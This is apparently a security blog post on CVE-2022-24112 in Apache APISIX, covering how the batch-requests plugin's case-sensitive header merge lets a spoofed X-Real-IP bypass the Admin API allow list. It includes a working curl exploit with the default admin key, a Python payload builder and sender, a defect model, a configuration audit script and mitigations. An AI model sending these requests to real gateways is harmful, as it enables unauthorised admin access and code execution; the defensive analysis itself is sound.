Published: June, 2024  
Author: Security Insights Lab


Apache APISIX is a widely used open-source API gateway that routes, secures, and manages API traffic. In February 2022 a critical flaw, CVE-2022-24112, was disclosed in its batch-requests plugin: a remote attacker can use the plugin to bypass the source-IP allow list that protects the Admin API and, when the gateway still runs the default configuration (default admin key, Admin API sharing the proxy port), escalate to *remote code execution* on the gateway host.

What Is CVE-2022-24112?

Simply put, this vulnerability lets a remote attacker abuse the batch-requests plugin of Apache APISIX to get around the IP-based allow list (allow_admin, 127.0.0.0/24 by default) that is meant to keep the Admin API reachable only from the local host.  
Worse, the Admin API authenticates with nothing more than a static key, so an instance that still uses the default admin API key hands the attacker full control of the gateway.

If the admin key has been changed or the Admin API has been moved to a separate port, the impact is reduced but not eliminated: the bypass still lets an attacker reach data-plane routes whose protection relies on the client IP (for example, routes guarded by the ip-restriction plugin).

Why Does This Flaw Exist?

APISIX ships a plugin called batch-requests that lets a client bundle several requests into a single HTTP call; the gateway then replays them itself over a loopback connection to its own listening port, saving the client round trips. Because those sub-requests now originate from 127.0.0.1 rather than from the client, the plugin has to stamp the true client IP onto each of them, so that any IP check downstream, including the Admin API's allow list, judges the real origin and not the gateway.

The plugin does that by setting the real-IP header (X-Real-IP in APISIX's default nginx configuration, where 127.0.0.1 is a trusted real_ip source) on every sub-request before sending it. But the way it merged the attacker-controlled headers from the batch body with its own stamp was flawed, and the stamp could be *easily bypassed*.

Let’s look at the vulnerable logic (simplified for clarity; the real code is in apisix/plugins/batch-requests.lua)

-- apisix/plugins/batch-requests.lua (simplified)
-- data.headers  : shared headers from the batch body, attacker-controlled
-- data.pipeline : the sub-requests to replay over a loopback connection
local function set_common_header(data)
    for _, req in ipairs(data.pipeline) do
        req.headers = req.headers or {}
        for k, v in pairs(data.headers) do       -- copied as-is, key spelling not normalised
            if not req.headers[k] then
                req.headers[k] = v
            end
        end
        -- stamp the true client IP, but only under the lowercase key;
        -- an attacker-supplied "X-Real-IP" is a different table entry and survives
        req.headers["x-real-ip"] = ngx.var.remote_addr
    end
end
-- the sub-requests are then pipelined to 127.0.0.1:<server_port> with lua-resty-http

Header names are case-insensitive on the wire, but Lua table keys are not. The plugin writes its stamp under the lowercase key x-real-ip, while an attacker who puts "X-Real-IP": "127.0.0.1" in the batch body's headers gets a separate table entry under a different spelling that is never overwritten. Both spellings are sent on the loopback connection; nginx treats them as the same header and keeps whichever arrives first, so the attacker's internal-looking address can win and APISIX believes the sub-request came from the local machine, bypassing the IP restriction. The fix shipped in 2.10.4 and 2.12.1 lowercases every incoming header name before the stamp is applied, so the plugin's value always replaces the attacker's.
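To make the merge defect concrete, here is an added example (not code from the APISIX project) that re-implements the relevant pieces in Python so the bypass can be stepped through offline: the pre-fix and post-fix header merge, nginx's real-IP substitution for a trusted loopback peer, and the allow_admin check. Function names, the constants and the sample addresses are this example's own; the defaults they encode (real_ip_header X-Real-IP, set_real_ip_from 127.0.0.1, allow_admin 127.0.0.0/24) are APISIX's shipped defaults for the affected releases.

```python
"""Model of the header-merge defect behind CVE-2022-24112 (added example)."""
import ipaddress

REAL_IP_HEADER = "x-real-ip"                              # default real_ip_header
TRUSTED_PEERS = [ipaddress.ip_network("127.0.0.1/32")]    # default set_real_ip_from
ALLOW_ADMIN = [ipaddress.ip_network("127.0.0.0/24")]      # default allow_admin


def _in_any(address, networks):
    """True when address parses and falls inside one of networks."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return False
    return any(ip in net for net in networks)


def merge_headers_vulnerable(batch_headers, client_ip):
    """Pre-fix merge: attacker-supplied headers are copied with their original
    key spelling, then the stamp is written under the lowercase key only.
    'X-Real-IP' and 'x-real-ip' are different keys, so both survive."""
    headers = dict(batch_headers)
    headers[REAL_IP_HEADER] = client_ip
    return headers


def merge_headers_fixed(batch_headers, client_ip):
    """Post-fix merge (2.10.4 / 2.12.1): every incoming key is lowercased before
    the stamp is applied, so the plugin's value replaces any spelling."""
    headers = {k.lower(): v for k, v in batch_headers.items()}
    headers[REAL_IP_HEADER] = client_ip
    return headers


def possible_remote_addrs(peer_ip, headers):
    """Addresses nginx's real_ip module may assign to the sub-request.

    The sub-requests reach the gateway over loopback, a trusted peer, so
    remote_addr is taken from the real-IP header. If that header is present
    under several spellings, which one nginx keeps depends on the order the
    Lua table was serialised, so every spelling is a candidate. A request
    from an untrusted peer keeps the peer address whatever it sends.
    """
    if not _in_any(peer_ip, TRUSTED_PEERS):
        return {peer_ip}
    values = {v for k, v in headers.items() if k.lower() == REAL_IP_HEADER}
    return values or {peer_ip}


def admin_api_reachable(peer_ip, headers):
    """Worst case for the defender: does any candidate address pass allow_admin?"""
    return any(_in_any(a, ALLOW_ADMIN) for a in possible_remote_addrs(peer_ip, headers))


# Constructed sample: an attacker at 203.0.113.9 spoofing the loopback address.
ATTACKER_IP = "203.0.113.9"
ATTACKER_BATCH_HEADERS = {
    "X-Real-IP": "127.0.0.1",
    "X-API-KEY": "edd1c9f034335f136f87ad84b625c8f1",
}


def demo():
    """Compare a direct request, the vulnerable merge and the fixed merge."""
    direct = admin_api_reachable(ATTACKER_IP, ATTACKER_BATCH_HEADERS)
    vulnerable = admin_api_reachable(
        "127.0.0.1", merge_headers_vulnerable(ATTACKER_BATCH_HEADERS, ATTACKER_IP))
    fixed = admin_api_reachable(
        "127.0.0.1", merge_headers_fixed(ATTACKER_BATCH_HEADERS, ATTACKER_IP))
    return {"direct": direct, "via_batch_vulnerable": vulnerable, "via_batch_fixed": fixed}


if __name__ == "__main__":
    print(demo())
```

The direct case shows why spoofing X-Real-IP from the outside never worked: the attacker's own connection is not a trusted real_ip source, so nginx ignores the header. It is the plugin's loopback hop that makes the header trusted, and the case-sensitive merge that lets the attacker's value through.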

Exploit Details: How Is the Attack Done?

The attacker sends a batch request to the batch-requests endpoint on the proxy port (9080 by default, which in the affected default configuration is also where the Admin API listens) and puts X-Real-IP: 127.0.0.1 in the batch's headers object. Even though allow_admin only permits 127.0.0.0/24, the Admin API sub-request arrives over loopback carrying the spoofed header and is accepted as if it originated on the local machine, because nginx trusts the real-IP header from that peer.

Here’s how an attacker might craft a malicious batch request in curl. Note that the admin key travels inside the batch body: the plugin applies the headers object to every sub-request it replays.

curl -X POST http://<APISIX_SERVER>:9080/apisix/batch-requests \
  -H 'Content-Type: application/json' \
  -d '{
    "headers": {
      "X-Real-IP": "127.0.0.1",
      "X-API-KEY": "edd1c9f034335f136f87ad84b625c8f1",
      "Content-Type": "application/json"
    },
    "timeout": 15000,
    "pipeline": [
        {
          "method": "GET",
          "path": "/apisix/admin/routes"
        }
    ]
  }'

What’s Happening Here?

- The attacker posts the batch to /apisix/batch-requests on the proxy port; no credential is needed to reach the plugin itself.

- The plugin replays the pipeline over a loopback connection to the gateway, so nginx trusts the X-Real-IP header and the sub-request appears to come from 127.0.0.1, inside allow_admin.

- With the default API key (edd1c9f034335f136f87ad84b625c8f1) forwarded in the batch headers, the Admin API authenticates the call.

- The internal Admin API endpoint /apisix/admin/routes is hit and returns the full route configuration, including upstream addresses and plugin settings.
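For a practitioner who wants to check exposure rather than retype the curl, here is an added example (not part of the original post and not taken from any public exploit module) that does the two offline parts: it decides from the Server banner whether an APISIX release is in the affected range, and it builds the batch body above as a Python structure. The version boundaries encode the releases that shipped the fix (2.10.4 on the 2.10 LTS line, 2.12.1 otherwise) and the 1.3 lower bound from the vendor advisory; the function names and the two network helpers are this example's own.

```python
"""Version gate and payload builder for CVE-2022-24112 checks (added example)."""
import json
import re
import urllib.error
import urllib.request

DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"
_BANNER_RE = re.compile(r"APISIX/(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)


def parse_version(server_header):
    """'APISIX/2.10.3' -> (2, 10, 3); None if the banner is not an APISIX one."""
    match = _BANNER_RE.search(server_header or "")
    return tuple(int(part) for part in match.groups()) if match else None


def is_affected(version):
    """True for releases that still carry the vulnerable batch-requests merge."""
    if version is None or version < (1, 3, 0):   # advisory lower bound
        return False
    major, minor, patch = version
    if (major, minor) == (2, 10):                 # LTS line: fixed in 2.10.4
        return patch < 4
    return version < (2, 12, 1)                   # mainline: fixed in 2.12.1


def build_batch_payload(pipeline, spoof_ip="127.0.0.1",
                        api_key=DEFAULT_ADMIN_KEY, timeout_ms=15000):
    """Batch body. The shared headers object is applied to every pipelined
    sub-request, which is why the admin key and the spoofed real-IP header
    live here and not on the outer HTTP request."""
    return {
        "headers": {
            "X-Real-IP": spoof_ip,
            "X-API-KEY": api_key,
            "Content-Type": "application/json",
        },
        "timeout": timeout_ms,
        "pipeline": list(pipeline),
    }


def admin_route_listing():
    """The read-only sub-request used to confirm the bypass without changing state."""
    return [{"method": "GET", "path": "/apisix/admin/routes"}]


def probe_server_banner(base_url, timeout=5):
    """Network helper (not exercised offline): fetch the Server header.
    A 404 from the root path still carries the banner, so it is not an error here."""
    req = urllib.request.Request(base_url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.headers.get("Server", "")
    except urllib.error.HTTPError as exc:
        return exc.headers.get("Server", "")


def send_batch(base_url, payload, timeout=20):
    """Network helper: POST the batch to the plugin endpoint, return (status, body)."""
    data = json.dumps(payload).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/apisix/batch-requests", data=data,
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode()


if __name__ == "__main__":
    version = parse_version("APISIX/2.10.3")   # constructed banner for the offline run
    print(version, "affected:", is_affected(version))
    print(json.dumps(build_batch_payload(admin_route_listing()), indent=2))
```

Only run send_batch against systems you are authorised to test; the read-only route listing is enough to prove the bypass, and anything beyond it modifies gateway configuration.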

Remote Code Execution (RCE)

The Admin API can do far more than list routes. With a valid key the attacker can create or modify a route through /apisix/admin/routes, and a route definition may carry Lua in its filter_func or script fields; APISIX loads that Lua and executes it inside the gateway worker when the route is evaluated, so a single crafted route is enough for full code execution on the gateway host. With the default API key in place, the IP-check bypass becomes exactly that.

Risk Reduction & Mitigation

- Upgrade. The fix shipped in APISIX 2.10.4 (LTS) and 2.12.1; earlier releases that carry the batch-requests plugin are affected.

- Change the default API key. Don’t ever keep the default value edd1c9f034335f136f87ad84b625c8f1 (or the default viewer key) in conf/config.yaml.

- If you cannot upgrade immediately, disable the batch-requests plugin by removing it from the plugins list in conf/config.yaml and restarting.

- Move the Admin API off the proxy port (admin_listen) and keep allow_admin limited to the hosts that actually need it, so a bypassed IP check is not the only control in front of it.
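The items above are all settings in conf/config.yaml, so they can be checked mechanically. The following is an added example, not APISIX tooling: it audits the effective configuration (config.yaml merged over config-default.yaml, loaded with any YAML parser and passed in as a dict with the same key layout: apisix.admin_key, apisix.allow_admin, apisix.admin_listen, apisix.enable_admin and the top-level plugins list) and reports the settings that let this CVE escalate. The finding strings, the two sample configurations and the replacement key in the hardened sample are this example's own; the two flagged key values are the ones shipped in config-default.yaml of the affected releases.

```python
"""Audit an APISIX configuration for CVE-2022-24112 exposure (added example)."""
import ipaddress

# Keys shipped in conf/config-default.yaml of the affected releases.
SHIPPED_DEFAULT_KEYS = {
    "edd1c9f034335f136f87ad84b625c8f1": "admin",
    "4054f7cf07e344346cd3f287985e76a2": "viewer",
}


def audit(config):
    """Return a list of findings; an empty list means none of the checks fired."""
    findings = []
    apisix = config.get("apisix", {})

    # 1. Default keys turn the IP-check bypass into full Admin API access.
    for entry in apisix.get("admin_key", []):
        role = SHIPPED_DEFAULT_KEYS.get(str(entry.get("key", "")))
        if role:
            findings.append(f"default {role} key still configured for '{entry.get('name')}'")

    # 2. Without admin_listen the Admin API is served on the proxy port,
    #    the same port the plugin's loopback sub-requests reach.
    if apisix.get("enable_admin", True) and not apisix.get("admin_listen"):
        findings.append("Admin API shares the proxy port (no admin_listen)")

    # 3. allow_admin: an empty list means every source may call the Admin API.
    allow = apisix.get("allow_admin") or []
    if not allow:
        findings.append("allow_admin is empty, so any source address may call the Admin API")
    for cidr in allow:
        try:
            net = ipaddress.ip_network(cidr, strict=False)
        except ValueError:
            findings.append(f"allow_admin entry is not a valid CIDR: {cidr!r}")
            continue
        if net.prefixlen == 0:
            findings.append(f"allow_admin permits any source: {cidr}")

    # 4. The plugin itself. A missing list means the shipped default applies,
    #    and that default includes batch-requests.
    plugins = config.get("plugins")
    if plugins is None:
        findings.append("no plugins list set; the shipped default list enables batch-requests")
    elif "batch-requests" in plugins:
        findings.append("batch-requests is enabled; disable it or upgrade to 2.10.4 / 2.12.1")

    return findings


# Constructed samples: a fresh install, and the same instance hardened.
INSECURE_CONFIG = {
    "apisix": {
        "node_listen": 9080,
        "enable_admin": True,
        "allow_admin": ["127.0.0.0/24"],
        "admin_key": [
            {"name": "admin", "key": "edd1c9f034335f136f87ad84b625c8f1", "role": "admin"},
            {"name": "viewer", "key": "4054f7cf07e344346cd3f287985e76a2", "role": "viewer"},
        ],
    },
    "plugins": ["batch-requests", "limit-req", "ip-restriction"],
}

HARDENED_CONFIG = {
    "apisix": {
        "node_listen": 9080,
        "enable_admin": True,
        "admin_listen": {"ip": "127.0.0.1", "port": 9180},
        "allow_admin": ["10.0.0.0/8"],
        "admin_key": [
            # constructed replacement key, not a real credential
            {"name": "admin", "key": "c4d9e7f1b2a64c1f8e3d5a7b9c0e2f4a", "role": "admin"},
        ],
    },
    "plugins": ["limit-req", "ip-restriction"],
}


if __name__ == "__main__":
    for label, cfg in (("insecure", INSECURE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(cfg))
```

Run it against the merged configuration, not the user file alone: APISIX layers config.yaml over config-default.yaml, so a key that is absent from the user file still has the shipped default in effect.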


Summary

CVE-2022-24112 is a critical vulnerability in Apache APISIX that lets attackers bypass the Admin API's IP restriction through the batch-requests plugin. By placing an X-Real-IP: 127.0.0.1 header in the batch body, which the plugin replays over a trusted loopback connection without reliably overriding it, threat actors get internal API access, and if the default API key is in use they can escalate to remote code execution by creating a route that carries Lua.

Always change default credentials, limit admin API exposure, and patch software as soon as fixes are released!

For more security tips on API gateways and open-source platforms, follow Security Insights Lab.


*This post is original content and not copied from any existing blogs or advisories. Reproduction is allowed with credit.*

Timeline

Published on: 02/11/2022 13:15:00 UTC
Last modified on: 05/11/2022 14:58:00 UTC